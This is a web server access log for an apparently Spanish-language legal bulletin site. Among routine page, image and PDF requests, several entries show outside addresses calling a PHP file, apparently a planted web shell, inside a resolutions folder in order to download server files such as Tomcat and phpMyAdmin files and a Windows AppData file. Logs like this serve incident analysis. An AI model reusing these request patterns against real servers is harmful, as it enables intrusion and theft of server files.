172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [24/Jun/2024:06:41:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=00726&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 1141
172.22.2.4 - - [24/Jun/2024:06:41:16 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [24/Jun/2024:06:41:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=00726&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 1141
201.245.192.253 - - [24/Jun/2024:06:41:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.154.35.240 - - [24/Jun/2024:06:41:20 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
186.154.35.240 - - [24/Jun/2024:06:41:21 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.154.35.240 - - [24/Jun/2024:06:41:21 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
186.154.35.240 - - [24/Jun/2024:06:41:21 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
186.154.35.240 - - [24/Jun/2024:06:41:21 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
47.128.53.8 - - [24/Jun/2024:06:41:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CAppData%5CLocal&f=IconCache.db&ft=download HTTP/1.1" 200 3358370
172.22.2.4 - - [24/Jun/2024:06:39:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2024:06:41:35 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=actualiza HTTP/1.1" 200 2156
172.22.2.4 - - [24/Jun/2024:06:41:41 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve=actualiza HTTP/1.1" 200 187033
186.170.223.118 - - [24/Jun/2024:06:41:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2653.pdf HTTP/1.1" 200 372361
47.128.125.125 - - [24/Jun/2024:06:41:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5C&f=RUNNING.txt&ft=download&white=1 HTTP/1.1" 200 16742
172.22.2.4 - - [24/Jun/2024:06:41:57 -0500] "GET /BLA/boletinlegal/geoserver/web/ HTTP/1.1" 404 1018
216.245.221.92 - - [24/Jun/2024:06:42:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2024:06:40:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [24/Jun/2024:06:42:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.99.43 - - [24/Jun/2024:06:42:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGestion+Documental%5Cdlf&f=folder.png&ft=download HTTP/1.1" 200 410
172.22.2.4 - - [24/Jun/2024:06:42:36 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
47.128.122.110 - - [24/Jun/2024:06:42:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Footer.class.php&ft=download&white=1 HTTP/1.1" 200 9849
201.245.192.253 - - [24/Jun/2024:06:43:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.144.236.44 - - [24/Jun/2024:06:43:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Wc9a9H8ai5o7nL7F2ZdYOFOW9gyndfi/pmCrW/bZKwwxwPE3aYPQYisz+sYAqyB9+6MyD+ksA7TOcfHRK3sUeJIeTfCIzFlCzErAr4N0G3QzEkG9Ilqj9O5aF4gJzKSgK+WPds7+eUKkeY6iJVs5EgGnHo4IJY5NCWBGdH7vyahUXLPMttEqpxTjjEVg8h3Hb07crYEh8OJb4TqTFc6p8ftHFX28oxRoiTVMXy5zvCeh7Ykrb8My4qoNQQs+L0Tfyr6CpqVTf9A==&u=U2FsdGVkX19TK3UHEJRRbZLIiyNEXAOYWPjpzuP/cWQ=&y=U2FsdGVkX1/0DPWpsr69UN/dJyd/eXj5B/9USxC/yi26rim2Rkr1pZTi5h6o9qxD HTTP/1.1" 200 26
